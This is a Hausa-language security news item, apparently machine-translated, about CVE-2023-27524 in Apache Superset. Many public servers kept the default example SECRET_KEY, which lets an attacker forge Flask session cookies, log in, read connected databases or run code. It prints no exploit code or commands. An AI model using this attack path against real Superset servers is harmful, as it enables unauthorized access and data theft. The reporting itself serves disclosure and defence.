Masu bincike daga Horizon3 sun ja hankali ga matsalolin tsaro a mafi yawan shigarwa na nazarin bayanan Apache Superset da dandamali na gani. A kan 2124 daga cikin sabar jama'a 3176 da aka yi nazari tare da Apache Superset, an gano amfani da madaidaicin maɓallin ɓoyayyen da aka ƙayyade ta tsohuwa a cikin fayil ɗin sanyi misali. Ana amfani da wannan maɓalli a cikin ɗakin karatu na Flask Python don samar da Kukis na zaman, wanda ke ba da damar maharin da ya san maɓalli don samar da sigogin zaman ƙage, haɗa zuwa cibiyar yanar gizo ta Apache Superset da loda bayanai daga bayanan bayanai masu alaƙa, ko tsara aiwatar da code tare da haƙƙin Apache Superset. .
Abin sha'awa shine, tun da farko masu binciken sun sanar da masu haɓaka matsalar a cikin 2021, bayan haka a cikin sakin Apache Superset 1.4.1, wanda aka kafa a cikin Janairu 2022, an maye gurbin ƙimar SECRET_KEY da layin "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET", an bincika. ƙara zuwa lambar, idan wannan ƙimar ta fitar da gargadi ga log ɗin.
A cikin Fabrairu na wannan shekara, masu bincike sun yanke shawarar maimaita binciken tsarin masu rauni kuma sun fuskanci gaskiyar cewa mutane kaɗan sun kula da gargaɗin kuma 67% na sabobin Apache Superset har yanzu sun ci gaba da amfani da maɓalli daga misalan sanyi, samfuran turawa ko takaddun shaida. A lokaci guda kuma, wasu manyan kamfanoni, jami'o'i da hukumomin gwamnati suna cikin ƙungiyoyin da ke amfani da maɓallan da ba su da tushe.
Ƙayyade maɓallin aiki a cikin ƙayyadaddun misali yanzu ana ganin shi azaman rauni (CVE-2023-27524), wanda aka gyara a cikin sakin Apache Superset 2.1 ta hanyar fitowar kuskuren da ke toshe dandamali daga farawa lokacin amfani da maɓallin da aka ƙayyade a ciki. misali (kawai maɓalli da aka ƙayyade a cikin tsarin misali na sigar yanzu ana la'akari da shi, tsoffin maɓallan maɓalli da maɓalli daga samfura da takaddun ba a toshe su). An gabatar da wani rubutu na musamman don bincika kasancewar rashin lahani akan hanyar sadarwa.
source: budenet.ru